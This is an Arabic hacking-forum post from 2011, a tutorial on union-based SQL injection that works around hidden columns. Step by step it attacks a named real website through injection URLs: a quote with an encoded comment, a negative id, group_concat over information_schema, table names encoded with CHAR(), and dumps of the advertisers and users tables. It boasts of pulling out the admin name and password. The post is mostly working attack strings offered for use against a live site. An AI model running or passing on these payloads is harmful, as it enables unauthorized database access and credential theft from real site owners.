عرض مشاركة واحدة
قديم 03-16-2011, 10:34 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
khiero
 
الصورة الرمزية khiero
 

 

 
إحصائية العضو





khiero غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
khiero is on a distinguished road

افتراضي تخطي عدم ظهور الاعمدة في الحقن




كيفكم اخواني الافاضل

اليوم معانا درس بسيط
ومفهوم ومهم

في بعض الاحيان يوقف الشخص عن العمل

لكن بعد اطلاعك على درس اليوم

لن تجد صعوبة باذن الله

مثلا معانا هذا الموقع

http://www.teaminsightmag.com/news.php?id=286 order by 15

لن تجد له خطأ
فعلينا اضافة


كود PHP:
 بعد المتغير اي الرقم 286  علامة '

وبعد الرابط  23%    وهى تعنى +--+  مشفرة 


الموقع الخاص اللي يشفر لنا الكلمات

http://www.waraxe.us/sql-char-encoder.html

شوفو النتيجة بدأت تظهر :surprised:



المهم الخطأ يختفي عند الرقم 11
والاستغلال يكون

http://www.teaminsightmag.com/news.p...7,8,9,10,11%23



ويصير هكذا لكن لم تظهر معانا الاعمدة ههههههههههه:gasp:
نضيف علامة - بعد علامة =

http://www.teaminsightmag.com/news.php?id=-286'+union+select+1,2,3,4,5,6,7,8,9,10,11%23

ظهرت معانا الاعمدة المصابة



ثم نضيف في العمود المصاب اي في مكان الرقم 3
group_concat(table_name)

و في اخر السطر
+from+information_schema.tables



وظهرت معانا

advertisers
articles
comments
events
manager_navigation
news_headlines
settings
sites
survey_answers
sur

طب واحد يقلى انا هاعرف فين الجدول الى هاشتغل علية من كل دول

اقول ناخد واحد واحد ونضيفة بعد +from+ ونجرب

+from+

واذا لم تفلح فلابد عليك انك تشفر الكلمات
مثلا نأخذ كلمة


advertisers تشفيرها يكون =

CONCAT(CHAR(97),CHAR(100),CHAR(118),CHAR(101),CHAR (114),CHAR(116),CHAR(105),CHAR(115),CHAR(101),CHAR (114),CHAR(115))

وهذه نضعها في مكان الرقم 3
group_concat(table_name,0x3e,column_name)

وهذه في اخر الرابط
+from+information_schema.columns+where+table_name+ like+
ونظيف لها الكلمة المشفرة

ويصير الرابط هكذا

http://www.teaminsightmag.com/news.php?id=-286%27+union+select+1,2,group_concat%28table_name, 0x3e,column_name%29,4,5,6,7,8,9,10,11++from+inform ation_schema.columns+where+table_name+like+CONCAT% 28CHAR%2897%29,CHAR%28100%29,CHAR%28118%29,CHAR%28 101%29,CHAR%28114%29,CHAR%28116%29,CHAR%28105%29,C HAR%28115%29,CHAR%28101%29,CHAR%28114%29,CHAR%2811 5%29%29%23



ظهر معانا



advertisers>id
advertisers>name
advertisers>url
advertisers>phone
advertisers>status
advertisers>site
advertisers>type


ونشوف كلمة name
ملاحظة دائما نعيد للوراء
ونضع كلمة name في مكان الرقم 3
و
+from+advertisers
في آخر الصفحة
وتصير الصفحة

http://www.teaminsightmag.com/news.p...advertisers%23



ظهر معانا اسم الادمن ههههههههههههه نكمل ولا لالالالالالالالالالالا

نجرب الطريقة العادية فى الحقن ونظهر الباس

concat(column_name,0x3e,table_schema,0x3e,table_na me)
+from+information_schema.columns+where+column_name +like+char(37, 112, 97, 115, 115, 37)%23

ظهر جدول مختلف

http://www.teaminsightmag.com/news.p...15,%2037%29%23

نغير الجدول ونجرب ونشوف

http://www.teaminsightmag.com/news.p...+from+users%23

الباس طلع وهو sdfasdasd






هههههه لا تنسى .... التقييم





jo'd u]l /i,v hghul]m td hgprk

   

رد مع اقتباس